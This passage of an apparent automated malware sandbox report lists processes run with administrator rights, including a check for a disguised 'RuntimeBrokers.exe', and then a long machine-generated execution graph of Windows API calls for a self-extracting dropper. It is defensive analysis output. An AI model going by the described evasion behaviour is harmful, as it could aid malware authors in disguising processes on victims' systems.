                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:48
                                                              Start time:03:51:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:49
                                                              Start time:03:51:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:17.9%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:26.9%
                                                                Total number of Nodes:1422
                                                                Total number of Limit Nodes:15
                                                                execution_graph 9093 410e7f 9094 410e9a 9093->9094 9095 410eb5 9094->9095 9097 40f42d 9094->9097 9098 40f445 free 9097->9098 9099 40f437 9097->9099 9100 4024e7 46 API calls 9098->9100 9099->9098 9101 40f456 9099->9101 9100->9101 9101->9095 9089 40e63c 9090 40e5d3 6 API calls 9089->9090 9091 40e644 9090->9091 8243 4024c4 8244 40245a 45 API calls 8243->8244 8245 4024cd 8244->8245 8246 4024d2 8245->8246 8247 4024d3 VirtualAlloc 8245->8247 8248 4096c7 _EH_prolog 8262 4096fa 8248->8262 8249 40971c 8250 409827 8283 40118a 8250->8283 8252 409851 8256 40985e ??2@YAPAXI 8252->8256 8253 40983c 8334 409425 8253->8334 8254 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8254->8262 8258 409878 8256->8258 8257 40969d 8 API calls 8257->8262 8263 409925 ??2@YAPAXI 8258->8263 8264 4098c2 8258->8264 8268 409530 3 API calls 8258->8268 8270 409425 3 API calls 8258->8270 8272 4099a2 8258->8272 8277 409a65 8258->8277 8293 409fb4 8258->8293 8297 408ea4 8258->8297 8340 409c13 ??2@YAPAXI 8258->8340 8342 409f49 8258->8342 8260 40e959 VirtualFree ??3@YAXPAX free free 8260->8262 8262->8249 8262->8250 8262->8254 8262->8257 8262->8260 8327 4095b7 8262->8327 8331 409403 8262->8331 8263->8258 8337 409530 8264->8337 8268->8258 8270->8258 8273 409530 3 API calls 8272->8273 8274 4099c7 8273->8274 8275 409425 3 API calls 8274->8275 8275->8249 8279 409530 3 API calls 8277->8279 8280 409a84 8279->8280 8281 409425 3 API calls 8280->8281 8281->8249 8284 401198 GetDiskFreeSpaceExW 8283->8284 8285 4011ee SendMessageW 8283->8285 8284->8285 8286 4011b0 8284->8286 8291 4011d6 8285->8291 8286->8285 8287 401f9d 19 API calls 8286->8287 8288 4011c9 8287->8288 8289 407717 25 API calls 8288->8289 8290 4011cf 8289->8290 8290->8291 8292 4011e7 8290->8292 8291->8252 8291->8253 8292->8285 8294 409fdd 8293->8294 8346 409dff 8294->8346 8620 40aef3 8297->8620 8300 408ec1 8300->8258 8302 408fd5 8638 408b7c 8302->8638 8303 408f0d ??2@YAPAXI 8312 408ef5 8303->8312 8305 408f31 ??2@YAPAXI 8305->8312 8312->8302 8312->8303 8312->8305 8680 40cdb8 ??2@YAPAXI 8312->8680 8328 4095c6 8327->8328 8330 4095cc 8327->8330 8328->8262 8329 4095e2 _CxxThrowException 8329->8328 8330->8328 8330->8329 8332 40e8e2 4 API calls 8331->8332 8333 40940b 8332->8333 8333->8262 8335 40e8da 3 API calls 8334->8335 8336 409433 8335->8336 8338 408963 3 API calls 8337->8338 8339 40953b 8338->8339 8341 409c45 8340->8341 8341->8258 8345 409f4e 8342->8345 8343 409f75 8343->8258 8344 409cde 110 API calls 8344->8345 8345->8343 8345->8344 8348 409e04 8346->8348 8347 409e3a 8347->8258 8348->8347 8350 409cde 8348->8350 8351 409cf8 8350->8351 8355 401626 8351->8355 8418 40db1f 8351->8418 8352 409d2c 8352->8348 8356 401642 8355->8356 8362 401638 8355->8362 8421 40a62f _EH_prolog 8356->8421 8358 40166f 8489 40eca9 8358->8489 8359 401411 2 API calls 8361 401688 8359->8361 8363 401962 ??3@YAXPAX 8361->8363 8364 40169d 8361->8364 8362->8352 8368 40eca9 VariantClear 8363->8368 8447 401329 8364->8447 8367 4016a8 8451 401454 8367->8451 8368->8362 8371 401362 2 API calls 8372 4016c7 ??3@YAXPAX 8371->8372 8377 4016d9 8372->8377 8404 401928 ??3@YAXPAX 8372->8404 8374 40eca9 VariantClear 8374->8362 8375 4016fa 8376 40eca9 VariantClear 8375->8376 8378 401702 ??3@YAXPAX 8376->8378 8377->8375 8379 401764 8377->8379 8388 401725 8377->8388 8378->8358 8382 4017a2 8379->8382 8383 401789 8379->8383 8380 40eca9 VariantClear 8381 401737 ??3@YAXPAX 8380->8381 8381->8358 8385 4017c4 GetLocalTime SystemTimeToFileTime 8382->8385 8386 4017aa 8382->8386 8384 40eca9 VariantClear 8383->8384 8387 401791 ??3@YAXPAX 8384->8387 8385->8386 8386->8388 8389 4017e1 8386->8389 8390 4017f8 8386->8390 8387->8358 8388->8380 8456 403354 lstrlenW 8389->8456 8480 40301a GetFileAttributesW 8390->8480 8394 401934 GetLastError 8394->8404 8395 401818 ??2@YAPAXI 8397 401824 8395->8397 8396 40192a 8396->8394 8493 40db53 8397->8493 8400 40190f 8403 40eca9 VariantClear 8400->8403 8401 40185f GetLastError 8496 4012f7 8401->8496 8403->8404 8404->8374 8405 401871 8406 403354 86 API calls 8405->8406 8409 40187f ??3@YAXPAX 8405->8409 8407 4018cc 8406->8407 8407->8409 8411 40db53 2 API calls 8407->8411 8410 40189c 8409->8410 8412 40eca9 VariantClear 8410->8412 8413 4018f1 8411->8413 8414 4018aa ??3@YAXPAX 8412->8414 8415 4018f5 GetLastError 8413->8415 8416 401906 ??3@YAXPAX 8413->8416 8414->8358 8415->8409 8416->8400 8612 40da56 8418->8612 8422 40a738 8421->8422 8423 40a66a 8421->8423 8424 40a687 8422->8424 8425 40a73d 8422->8425 8423->8424 8426 40a704 8423->8426 8427 40a679 8423->8427 8434 40a6ad 8424->8434 8525 40a3b0 8424->8525 8428 40a6f2 8425->8428 8431 40a747 8425->8431 8433 40a699 8425->8433 8426->8434 8499 40e69c 8426->8499 8427->8428 8429 40a67e 8427->8429 8521 40ed34 8428->8521 8437 40a684 8429->8437 8446 40a6b2 8429->8446 8431->8428 8431->8446 8433->8434 8513 40ed59 8433->8513 8508 40ecae 8434->8508 8436 40a71a 8502 40eced 8436->8502 8437->8424 8437->8433 8443 40eca9 VariantClear 8444 40166b 8443->8444 8444->8358 8444->8359 8446->8434 8517 40ed79 8446->8517 8448 401340 8447->8448 8449 40112b 2 API calls 8448->8449 8450 40134b 8449->8450 8450->8367 8452 4012f7 2 API calls 8451->8452 8453 401462 8452->8453 8540 4013e2 8453->8540 8455 40146d 8455->8371 8457 4024fc 2 API calls 8456->8457 8458 403375 8457->8458 8459 40112b 2 API calls 8458->8459 8462 403385 8458->8462 8459->8462 8461 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8463 4033e8 8461->8463 8464 4033f2 8461->8464 8462->8461 8472 403477 8462->8472 8543 401986 CreateDirectoryW 8462->8543 8465 40301a 22 API calls 8463->8465 8466 401986 4 API calls 8464->8466 8469 4033f8 ??3@YAXPAX 8464->8469 8465->8464 8478 403405 8466->8478 8467 4034a7 8468 407776 55 API calls 8467->8468 8475 4034b1 ??3@YAXPAX 8468->8475 8477 4034bc 8469->8477 8470 40340a 8549 407776 8470->8549 8472->8467 8472->8469 8473 40346b ??3@YAXPAX 8473->8477 8474 40341d memcpy 8474->8478 8475->8477 8477->8388 8478->8470 8478->8473 8478->8474 8479 401986 4 API calls 8478->8479 8479->8478 8481 403037 8480->8481 8487 401804 8480->8487 8482 403048 8481->8482 8483 40303b SetLastError 8481->8483 8484 403051 8482->8484 8486 40305f FindFirstFileW 8482->8486 8482->8487 8483->8487 8568 402fed 8484->8568 8486->8484 8488 403072 FindClose CompareFileTime 8486->8488 8487->8394 8487->8395 8487->8396 8488->8484 8488->8487 8490 40ec65 8489->8490 8491 40ec86 VariantClear 8490->8491 8492 40ec9d 8490->8492 8491->8362 8492->8362 8609 40db3c 8493->8609 8497 40112b 2 API calls 8496->8497 8498 401311 8497->8498 8498->8405 8500 4012f7 2 API calls 8499->8500 8501 40e6a9 8500->8501 8501->8436 8529 40ecd7 8502->8529 8505 40ed12 8506 40a726 ??3@YAXPAX 8505->8506 8507 40ed17 _CxxThrowException 8505->8507 8506->8434 8507->8506 8532 40ec65 8508->8532 8510 40ecba 8511 40a7b2 8510->8511 8512 40ecbe memcpy 8510->8512 8511->8443 8512->8511 8514 40ed62 8513->8514 8515 40ed67 8513->8515 8516 40ecd7 VariantClear 8514->8516 8515->8434 8516->8515 8518 40ed82 8517->8518 8519 40ed87 8517->8519 8520 40ecd7 VariantClear 8518->8520 8519->8434 8520->8519 8522 40ed42 8521->8522 8523 40ed3d 8521->8523 8522->8434 8524 40ecd7 VariantClear 8523->8524 8524->8522 8526 40a3c2 8525->8526 8527 40a3de 8526->8527 8536 40eda0 8526->8536 8527->8434 8530 40eca9 VariantClear 8529->8530 8531 40ecdf SysAllocString 8530->8531 8531->8505 8531->8506 8533 40ec6d 8532->8533 8534 40ec86 VariantClear 8533->8534 8535 40ec9d 8533->8535 8534->8510 8535->8510 8537 40edae 8536->8537 8538 40eda9 8536->8538 8537->8527 8539 40ecd7 VariantClear 8538->8539 8539->8537 8541 401398 2 API calls 8540->8541 8542 4013f2 8541->8542 8542->8455 8544 4019c7 8543->8544 8545 401997 GetLastError 8543->8545 8544->8462 8546 4019b1 GetFileAttributesW 8545->8546 8548 4019a6 8545->8548 8546->8544 8546->8548 8547 4019a7 SetLastError 8547->8462 8548->8544 8548->8547 8550 401f9d 19 API calls 8549->8550 8551 40778a wvsprintfW 8550->8551 8552 407859 8551->8552 8553 4077ab GetLastError FormatMessageW 8551->8553 8556 4076a8 25 API calls 8552->8556 8554 4077d9 FormatMessageW 8553->8554 8555 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8553->8555 8554->8552 8554->8555 8560 4076a8 8555->8560 8558 407865 8556->8558 8558->8469 8561 407715 ??3@YAXPAX LocalFree 8560->8561 8562 4076b7 8560->8562 8561->8558 8563 40661a 2 API calls 8562->8563 8564 4076c6 IsWindow 8563->8564 8565 4076ef 8564->8565 8566 4076dd IsBadReadPtr 8564->8566 8567 4073d1 21 API calls 8565->8567 8566->8565 8567->8561 8574 402c86 8568->8574 8570 402ff6 8571 403017 8570->8571 8572 402ffb GetLastError 8570->8572 8571->8487 8573 403006 8572->8573 8573->8487 8575 402c93 GetFileAttributesW 8574->8575 8576 402c8f 8574->8576 8577 402ca4 8575->8577 8578 402ca9 8575->8578 8576->8570 8577->8570 8579 402cc7 8578->8579 8580 402cad SetFileAttributesW 8578->8580 8585 402b79 8579->8585 8582 402cc3 8580->8582 8583 402cba DeleteFileW 8580->8583 8582->8570 8583->8570 8586 4024fc 2 API calls 8585->8586 8587 402b90 8586->8587 8588 40254d 2 API calls 8587->8588 8589 402b9d FindFirstFileW 8588->8589 8590 402c55 SetFileAttributesW 8589->8590 8603 402bbf 8589->8603 8592 402c60 RemoveDirectoryW 8590->8592 8593 402c78 ??3@YAXPAX 8590->8593 8591 401329 2 API calls 8591->8603 8592->8593 8594 402c6d ??3@YAXPAX 8592->8594 8595 402c80 8593->8595 8594->8595 8595->8570 8597 40254d 2 API calls 8597->8603 8598 402c24 SetFileAttributesW 8598->8593 8602 402c2d DeleteFileW 8598->8602 8599 402bef lstrcmpW 8600 402c05 lstrcmpW 8599->8600 8601 402c38 FindNextFileW 8599->8601 8600->8601 8600->8603 8601->8603 8604 402c4e FindClose 8601->8604 8602->8603 8603->8591 8603->8593 8603->8597 8603->8598 8603->8599 8603->8601 8605 402b79 2 API calls 8603->8605 8606 401429 8603->8606 8604->8590 8605->8603 8607 401398 2 API calls 8606->8607 8608 401433 8607->8608 8608->8603 8610 40db1f 2 API calls 8609->8610 8611 401857 8610->8611 8611->8400 8611->8401 8617 40d985 8612->8617 8615 40da65 CreateFileW 8616 40da8a 8615->8616 8616->8352 8618 40d98f CloseHandle 8617->8618 8619 40d99a 8617->8619 8618->8619 8619->8615 8619->8616 8621 40af0c 8620->8621 8636 408ebd 8620->8636 8621->8636 8713 40ac7a 8621->8713 8623 40af3f 8624 40ac7a 7 API calls 8623->8624 8625 40b0cb 8623->8625 8629 40af96 8624->8629 8627 40e959 4 API calls 8625->8627 8626 40afbd 8720 40e959 8626->8720 8627->8636 8629->8625 8629->8626 8630 40b043 8631 40e959 4 API calls 8630->8631 8634 40b07f 8631->8634 8632 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8633 40afc6 8632->8633 8633->8630 8633->8632 8635 40e959 4 API calls 8634->8635 8635->8636 8636->8300 8637 4065ea InitializeCriticalSection 8636->8637 8637->8312 8732 4086f0 8638->8732 8681 40cdc7 8680->8681 8682 408761 4 API calls 8681->8682 8683 40cdde 8682->8683 8683->8312 8714 40e8da 3 API calls 8713->8714 8715 40ac86 8714->8715 8724 40e811 8715->8724 8717 40aca2 8717->8623 8718 409403 4 API calls 8719 40ac90 8718->8719 8719->8717 8719->8718 8721 40e93b 8720->8721 8722 40e8da 3 API calls 8721->8722 8723 40e943 ??3@YAXPAX 8722->8723 8723->8633 8725 40e8a5 8724->8725 8726 40e824 8724->8726 8725->8719 8727 40e833 _CxxThrowException 8726->8727 8728 40e863 ??2@YAPAXI 8726->8728 8729 40e895 ??3@YAXPAX 8726->8729 8727->8726 8728->8726 8730 40e879 memcpy 8728->8730 8729->8725 8730->8729 8733 40e8da 3 API calls 8732->8733 8734 4086f8 8733->8734 8735 40e8da 3 API calls 8734->8735 8736 408700 8735->8736 8737 40e8da 3 API calls 8736->8737 8738 408708 8737->8738 9102 40dace 9105 40daac 9102->9105 9108 40da8f 9105->9108 9109 40da56 2 API calls 9108->9109 9110 40daa9 9109->9110 9092 40dadc ReadFile 9111 411def __set_app_type __p__fmode __p__commode 9112 411e5e 9111->9112 9113 411e72 9112->9113 9114 411e66 __setusermatherr 9112->9114 9123 411f66 _controlfp 9113->9123 9114->9113 9116 411e77 _initterm __getmainargs _initterm 9117 411ecb GetStartupInfoA 9116->9117 9119 411eff GetModuleHandleA 9117->9119 9124 4064af _EH_prolog 9119->9124 9123->9116 9127 404faa 9124->9127 9432 401b37 GetModuleHandleW CreateWindowExW 9127->9432 9130 404fdc 9131 40648e MessageBoxA 9130->9131 9133 404ff6 9130->9133 9132 4064a5 exit _XcptFilter 9131->9132 9134 401411 2 API calls 9133->9134 9135 40502d 9134->9135 9136 401411 2 API calls 9135->9136 9137 405035 9136->9137 9435 403e23 9137->9435 9142 40254d 2 API calls 9143 405073 9142->9143 9444 402a69 9143->9444 9145 40507c 9458 403d71 9145->9458 9148 40509b _wtol 9150 4050b1 9148->9150 9463 404405 9150->9463 9151 4050d6 9152 403d71 6 API calls 9151->9152 9153 4050e1 9152->9153 9154 4050e7 9153->9154 9155 405118 9153->9155 9654 404996 9154->9654 9156 405130 GetModuleFileNameW 9155->9156 9158 40112b 2 API calls 9155->9158 9159 405151 9156->9159 9160 405142 9156->9160 9158->9156 9165 403d71 6 API calls 9159->9165 9162 407776 55 API calls 9160->9162 9161 4050ee ??3@YAXPAX 9672 403e70 9161->9672 9170 4050ec 9162->9170 9164 4050ff ??3@YAXPAX ??3@YAXPAX 9164->9132 9177 405173 9165->9177 9166 4052d5 9167 401362 2 API calls 9166->9167 9168 4052e5 9167->9168 9169 401362 2 API calls 9168->9169 9174 4052f2 9169->9174 9170->9161 9171 4051fa 9171->9170 9172 40522a 9171->9172 9176 405213 _wtol 9171->9176 9173 403d71 6 API calls 9172->9173 9182 405289 9173->9182 9175 40538d ??2@YAPAXI 9174->9175 9178 401329 2 API calls 9174->9178 9184 405399 9175->9184 9176->9172 9177->9166 9177->9170 9177->9171 9177->9172 9181 401429 2 API calls 9177->9181 9179 405327 9178->9179 9180 401329 2 API calls 9179->9180 9186 40533d 9180->9186 9181->9177 9182->9166 9183 404594 2 API calls 9182->9183 9185 4052ba 9183->9185 9187 4053cf 9184->9187 9191 407776 55 API calls 9184->9191 9185->9166 9189 401362 2 API calls 9185->9189 9190 401362 2 API calls 9186->9190 9488 4025ae 9187->9488 9189->9166 9193 405367 9190->9193 9191->9187 9195 401f9d 19 API calls 9193->9195 9194 4025ae 2 API calls 9197 4053f6 9194->9197 9196 40536e 9195->9196 9198 40254d 2 API calls 9196->9198 9199 4025ae 2 API calls 9197->9199 9200 405377 9198->9200 9201 4053fe 9199->9201 9200->9175 9491 404e3f 9201->9491 9206 40546f 9208 405534 9206->9208 9211 403d71 6 API calls 9206->9211 9207 402844 10 API calls 9209 405441 9207->9209 9210 40e8da 3 API calls 9208->9210 9209->9206 9214 407776 55 API calls 9209->9214 9212 40553c 9210->9212 9213 405493 9211->9213 9215 405573 9212->9215 9519 403093 9212->9519 9213->9208 9221 40549d 9213->9221 9216 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9214->9216 9218 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9215->9218 9219 40557c 9215->9219 9216->9206 9218->9161 9218->9170 9223 405588 wsprintfW 9219->9223 9224 4055ed 9219->9224 9230 401411 2 API calls 9219->9230 9231 401329 ??2@YAPAXI ??3@YAXPAX 9219->9231 9234 401f9d 19 API calls 9219->9234 9703 402f6c ??2@YAPAXI 9219->9703 9709 402425 ??3@YAXPAX ??3@YAXPAX 9219->9709 9221->9218 9677 404cbc 9221->9677 9222 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9225 4054f5 9222->9225 9226 401411 2 API calls 9223->9226 9553 404603 9224->9553 9225->9218 9226->9219 9229 4054cc 9229->9218 9232 407776 55 API calls 9229->9232 9230->9219 9231->9219 9233 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9232->9233 9233->9225 9234->9219 9235 40584a 9236 404603 26 API calls 9235->9236 9268 40586a 9236->9268 9240 405933 9615 404034 9240->9615 9241 4024fc 2 API calls 9241->9268 9245 4059d8 CoInitialize 9252 40243b lstrcmpW 9245->9252 9246 40595a 9249 40243b lstrcmpW 9246->9249 9247 405935 ??3@YAXPAX 9247->9240 9251 405969 9249->9251 9250 401411 ??2@YAPAXI ??3@YAXPAX 9250->9268 9253 405979 9251->9253 9255 401f9d 19 API calls 9251->9255 9254 4059fe 9252->9254 9736 403b40 9253->9736 9256 405a12 9254->9256 9259 401329 2 API calls 9254->9259 9255->9253 9621 403b59 9256->9621 9258 401362 2 API calls 9258->9268 9259->9256 9262 4055f6 9262->9235 9275 403b94 lstrlenW lstrlenW _wcsnicmp 9262->9275 9279 4057dd _wtol 9262->9279 9296 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9262->9296 9710 40484d 9262->9710 9721 40408b 9262->9721 9264 4073d1 21 API calls 9267 40599c 9264->9267 9265 401329 2 API calls 9265->9268 9266 405a4d 9270 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9266->9270 9310 405a61 9266->9310 9756 4082e9 9266->9756 9271 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9267->9271 9268->9240 9268->9241 9268->9247 9268->9250 9268->9258 9268->9265 9273 402f6c 7 API calls 9268->9273 9612 40243b 9268->9612 9735 402425 ??3@YAXPAX ??3@YAXPAX 9268->9735 9270->9266 9271->9170 9273->9268 9275->9262 9276 405910 ??3@YAXPAX 9276->9268 9277 401411 2 API calls 9277->9310 9279->9262 9280 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9302 405bf3 9280->9302 9281 405a9f GetKeyState 9281->9310 9282 405c6c 9283 405ca2 9282->9283 9284 405c74 9282->9284 9288 4012f7 2 API calls 9283->9288 9798 403f85 9284->9798 9286 401429 ??2@YAPAXI ??3@YAXPAX 9286->9310 9289 405cb0 9288->9289 9292 403b59 15 API calls 9289->9292 9297 405cb9 9292->9297 9293 407776 55 API calls 9298 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9293->9298 9294 40243b lstrcmpW 9294->9310 9295 401362 2 API calls 9299 405c91 ??3@YAXPAX 9295->9299 9296->9170 9301 405cca ??3@YAXPAX 9297->9301 9305 401362 2 API calls 9297->9305 9298->9302 9306 405cd9 9299->9306 9300 401329 ??2@YAPAXI ??3@YAXPAX 9300->9310 9301->9306 9302->9293 9303 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9302->9303 9303->9302 9304 405bcd ??3@YAXPAX 9304->9310 9305->9301 9307 405d24 9306->9307 9308 405d16 9306->9308 9811 40786b 9307->9811 9628 404a44 9308->9628 9310->9277 9310->9280 9310->9281 9310->9282 9310->9286 9310->9294 9310->9300 9310->9302 9310->9303 9310->9304 9783 407613 9310->9783 9792 407674 9310->9792 9312 405d20 9313 405d65 9312->9313 9817 403e0d 9312->9817 9314 404034 21 API calls 9313->9314 9316 405d77 9314->9316 9318 401411 2 API calls 9316->9318 9319 406373 9316->9319 9320 405d95 9318->9320 9321 4063f7 9319->9321 9324 40243b lstrcmpW 9319->9324 9364 405da8 9320->9364 9821 40453e 9320->9821 9323 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9321->9323 9329 40243b lstrcmpW 9321->9329 9326 406461 9323->9326 9327 406467 ??3@YAXPAX 9323->9327 9325 4063a4 9324->9325 9325->9321 9848 403f48 9325->9848 9326->9327 9328 403e70 4 API calls 9327->9328 9330 406478 ??3@YAXPAX ??3@YAXPAX 9328->9330 9332 406416 9329->9332 9330->9132 9331 401411 ??2@YAPAXI ??3@YAXPAX 9331->9364 9332->9323 9336 406423 9332->9336 9335 405dd8 9339 405de5 9335->9339 9340 4061fa ??3@YAXPAX ??3@YAXPAX 9335->9340 9337 4012f7 2 API calls 9336->9337 9342 406432 9337->9342 9338 4073d1 21 API calls 9343 4063e0 ??3@YAXPAX 9338->9343 9830 4043c6 9339->9830 9344 406312 9340->9344 9341 40243b lstrcmpW 9341->9364 9853 404aff 9342->9853 9343->9321 9347 40636a ??3@YAXPAX 9344->9347 9350 404034 21 API calls 9344->9350 9346 405e45 9352 401329 2 API calls 9346->9352 9347->9319 9355 406321 9350->9355 9356 405e4e 9352->9356 9353 4043c6 2 API calls 9354 405e0e 9353->9354 9357 401362 2 API calls 9354->9357 9838 4048ab 9355->9838 9361 403b7f 19 API calls 9356->9361 9362 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9357->9362 9359 40626b ??3@YAXPAX ??3@YAXPAX 9359->9344 9360 401329 2 API calls 9360->9364 9377 405e57 9361->9377 9365 406211 9362->9365 9366 405e41 9362->9366 9363 40633a SetCurrentDirectoryW 9367 4048ab 4 API calls 9363->9367 9364->9331 9364->9335 9364->9341 9364->9346 9364->9359 9364->9360 9368 401429 2 API calls 9364->9368 9371 403e0d 16 API calls 9365->9371 9366->9346 9369 406362 9367->9369 9370 405ee5 ??3@YAXPAX ??3@YAXPAX 9368->9370 9372 403e0d 16 API calls 9369->9372 9370->9364 9373 406216 9371->9373 9372->9347 9374 407776 55 API calls 9373->9374 9375 40621f 7 API calls 9374->9375 9376 40625e 9375->9376 9376->9359 9378 405f61 _wtol 9377->9378 9379 403bce lstrlenW lstrlenW _wcsnicmp 9377->9379 9380 406025 9377->9380 9378->9377 9379->9377 9381 406080 9380->9381 9382 40602e 9380->9382 9383 401362 2 API calls 9381->9383 9384 406053 9382->9384 9385 406034 9382->9385 9386 40607e 9383->9386 9388 401329 2 API calls 9384->9388 9387 401329 2 API calls 9385->9387 9389 40254d 2 API calls 9386->9389 9390 40603f 9387->9390 9391 406051 9388->9391 9392 406092 9389->9392 9393 40254d 2 API calls 9390->9393 9394 40243b lstrcmpW 9391->9394 9395 401411 2 API calls 9392->9395 9396 406048 9393->9396 9397 406068 9394->9397 9398 40609a 9395->9398 9399 40254d 2 API calls 9396->9399 9397->9392 9401 40254d 2 API calls 9397->9401 9400 401411 2 API calls 9398->9400 9399->9391 9402 4060a2 memset 9400->9402 9401->9386 9403 4060e1 9402->9403 9404 404594 2 API calls 9403->9404 9405 4060fe 9404->9405 9406 401329 2 API calls 9405->9406 9407 406109 9406->9407 9408 403b7f 19 API calls 9407->9408 9409 406112 9408->9409 9410 4061b1 9409->9410 9648 4021ed 9409->9648 9412 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9412 9414 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9414 9412->9344 9414->9340 9415 406150 9417 403b7f 19 API calls 9415->9417 9416 401429 2 API calls 9418 406147 9416->9418 9419 406168 ShellExecuteExW 9417->9419 9421 40254d 2 API calls 9418->9421 9422 406282 9419->9422 9423 40618c 9419->9423 9421->9415 9426 407776 55 API calls 9422->9426 9424 4061a0 CloseHandle 9423->9424 9425 406192 WaitForSingleObject 9423->9425 9835 402185 9424->9835 9425->9424 9428 40628c 9426->9428 9429 403e0d 16 API calls 9428->9429 9430 406291 9 API calls 9429->9430 9431 4062e1 9430->9431 9431->9412 9433 401b6c SetTimer GetMessageW DispatchMessageW KillTimer DestroyWindow 9432->9433 9434 401b9f GetVersionExW 9432->9434 9433->9434 9434->9130 9434->9131 9436 40112b 2 API calls 9435->9436 9437 403e38 GetCommandLineW 9436->9437 9438 404594 9437->9438 9439 4045ce 9438->9439 9441 4045a2 9438->9441 9440 4045c6 9439->9440 9443 401429 2 API calls 9439->9443 9440->9142 9441->9440 9442 401429 2 API calls 9441->9442 9442->9441 9443->9439 9445 401411 2 API calls 9444->9445 9453 402a79 9445->9453 9446 401362 2 API calls 9447 402b6c ??3@YAXPAX 9446->9447 9447->9145 9448 401429 ??2@YAPAXI ??3@YAXPAX 9448->9453 9449 402b5f 9449->9446 9451 401411 2 API calls 9451->9453 9453->9448 9453->9449 9453->9451 9454 401362 2 API calls 9453->9454 9892 4025c6 9453->9892 9895 40272e 9453->9895 9455 402ad9 ??3@YAXPAX 9454->9455 9456 4013e2 2 API calls 9455->9456 9457 402aee ??3@YAXPAX ??3@YAXPAX 9456->9457 9457->9453 9459 403d80 9458->9459 9460 403dbd 9459->9460 9461 403d9a lstrlenW lstrlenW 9459->9461 9460->9148 9460->9150 9906 401a85 9461->9906 9464 401f47 3 API calls 9463->9464 9465 404416 9464->9465 9466 401f9d 19 API calls 9465->9466 9467 40441d 9466->9467 9468 401f9d 19 API calls 9467->9468 9469 404429 9468->9469 9470 401f9d 19 API calls 9469->9470 9471 404435 9470->9471 9472 401f9d 19 API calls 9471->9472 9473 404441 9472->9473 9474 401f9d 19 API calls 9473->9474 9475 40444d 9474->9475 9476 401f9d 19 API calls 9475->9476 9477 404459 9476->9477 9478 401f9d 19 API calls 9477->9478 9479 404465 9478->9479 9480 404480 SHGetSpecialFolderPathW 9479->9480 9483 404533 #17 9479->9483 9484 401411 2 API calls 9479->9484 9485 401329 ??2@YAPAXI ??3@YAXPAX 9479->9485 9487 402f6c 7 API calls 9479->9487 9911 402425 ??3@YAXPAX ??3@YAXPAX 9479->9911 9480->9479 9481 40449a wsprintfW 9480->9481 9482 401411 2 API calls 9481->9482 9482->9479 9483->9151 9484->9479 9485->9479 9487->9479 9489 4022b0 2 API calls 9488->9489 9490 4025c2 9489->9490 9490->9194 9912 403e86 9491->9912 9493 404e56 9494 403e86 2 API calls 9493->9494 9495 404e65 9494->9495 9916 404343 9495->9916 9499 404e82 ??3@YAXPAX 9500 404343 3 API calls 9499->9500 9501 404e9d 9500->9501 9502 403ec1 2 API calls 9501->9502 9503 404ea8 ??3@YAXPAX wsprintfA 9502->9503 9932 403ef6 9503->9932 9505 404ed0 9506 403ef6 2 API calls 9505->9506 9507 404edb 9506->9507 9508 402844 9507->9508 9509 402851 9508->9509 9517 40dcfb 3 API calls 9509->9517 9510 402863 lstrlenA lstrlenA 9515 402890 9510->9515 9511 40296e 9511->9206 9511->9207 9512 40293b memmove 9512->9511 9512->9515 9513 4028db memcmp 9513->9511 9513->9515 9514 402918 memcmp 9514->9515 9515->9511 9515->9512 9515->9513 9515->9514 9518 40dcc7 GetLastError 9515->9518 9943 402640 9515->9943 9517->9510 9518->9515 9520 4025ae 2 API calls 9519->9520 9536 4030a8 9520->9536 9521 403301 9522 403344 ??3@YAXPAX 9521->9522 9523 40334e 9522->9523 9523->9215 9523->9222 9524 401411 ??2@YAPAXI ??3@YAXPAX 9524->9536 9526 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9526->9536 9527 401362 2 API calls 9528 4030f3 ??3@YAXPAX ??3@YAXPAX 9527->9528 9529 403303 9528->9529 9528->9536 9956 4029c3 9529->9956 9533 40331c ??3@YAXPAX 9533->9523 9534 4031e5 strncmp 9535 4031d0 strncmp 9534->9535 9534->9536 9535->9534 9535->9536 9536->9521 9536->9524 9536->9526 9536->9527 9536->9529 9536->9534 9537 401362 2 API calls 9536->9537 9538 402640 2 API calls 9536->9538 9541 402640 ??2@YAPAXI ??3@YAXPAX 9536->9541 9544 402f6c 7 API calls 